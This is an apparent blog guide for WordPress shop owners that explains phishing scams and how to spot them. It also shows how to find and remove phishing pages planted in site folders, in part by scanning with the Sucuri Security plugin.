When running an online store on WordPress, beware of online shopping scammers that can scare away your potential customers. With improper maintenance, WordPress can be vulnerable to phishing attacks from pages and emails.

These cybercriminals do more than just stealing your money. By pretending to be you, they can easily take sensitive information like passwords, addresses, and credit cards. Victims lose their privacy, and your store’s reputation will be tarnished.

We will talk more about online shopping scammers and how to avoid them. However, before we get into that, you must cover the basics first.

Ensure that you run a credible and reputable WordPress site to avoid attracting scammers to your site. Always consult a reliable hosting company to guarantee that your website is secure.


What is a Phishing Attack?

Phishing is a type of cyber attack that is used to steal personal information. To do so, scammers will use deceptive web pages and emails that look legitimate. The data gathered from this method will be used to commit fraud.

For instance, scammers might send emails and pretend to be from a reputable online store. They ask the receivers to click on a particular link and enter their personal details in order to get a discount code.

Moreover, scammers can also use spam comments to send forged links to your visitors. Their comments usually contain a compliment, request for more information, and a link at the end. Learn how to stop spam comments to prevent this from happening to your site.

How to Spot and Avoid Phishing Scams

Pay attention to these tips to help you know when someone is scamming you:

  • Always check if the site is secure. Ensure that the site is using HTTPS URLs, as all transferred data will be encrypted.
  • Research the site’s credibility. Look for online reviews to see if people have shopped with them before. You can also visit business review sites like Better Business Bureau to check the reliability of the seller.
  • Confirm the authenticity of the sellers’ contact details. Examine the site’s contact page and try to reach them. If the page lacks basic information like emails and phone numbers, this is a red sign of phishing websites.
  • Check your bank and credit card company. Stay up-to-date with your bank to monitor any unprecedented withdrawals.
  • Examine the page’s URL directory. In some cases, a credible site might have been compromised, and the attackers managed to insert a phishing page. Most of the time, the directory of this page will not make sense, like example.com/wp-content/gallery/media/login.php. A login page will never be placed inside the media folder.

How to Clean Phishing Pages on Your WordPress Site

Scammers can gain access to your site the same way customers can get spoofed: fake emails and webpages. In this case, you probably visited a fake page admin and entered your credentials there.

The majority of WordPress administrators experience difficulty in identifying phishing pages because they are often hidden. You can only find them when a person reports it to you or by inspecting your web files.

Phishing pages are usually buried deep within your directories. For that reason, you need to download all of your files first and then browse through the folders and subfolders.

Look for files with the same name as the page it tries to mimic. If the phishing page imitates your contact page, for instance, look for files named “contact.” Also, check subfolders that are not linked to the main page, like themes, uploads, and plugins folders. These files can be hidden anywhere.

With so many folders to scan, manually cleaning your site will take a lot of time. As an alternative, you can try installing some helping plugins.

Removing Phishing Pages with a WordPress Plugin

To help you detect phishing pages, we recommend using Sucuri Security. Once you install and activate it, follow the steps below:

      1. Generate a free API key to prevent attackers from deleting scan logs, and allow the plugin to display statistics. From your WordPress dashboard, head over to Sucuri Security -> Dashboard, and click Generate API Key.


      2. Make sure that the website and email fields are filled out correctly. Tick the Terms of Service and Privacy Policy agreement, and press Submit.

      3. Once installed, Sucuri will automatically scan your website for you. The results can be found on the Sucuri’s dashboard.

By default, Sucuri will perform a daily scan on your website. To change the frequency, go to Sucuri Security -> Settings, and select the Scanner tab. Tick the box for sucuriscan_scheduled_scan, and select the desired schedule (once daily, weekly, monthly, and more). Hit the Submit button when you’re done.


Building trust is crucial for online businesses, and one way to ensure that is to secure your website. Be aware of emails and pages that pretend to be from WordPress, so they can’t steal your login credentials. Moreover, make sure to scan your website regularly to remove any malware. Best of luck.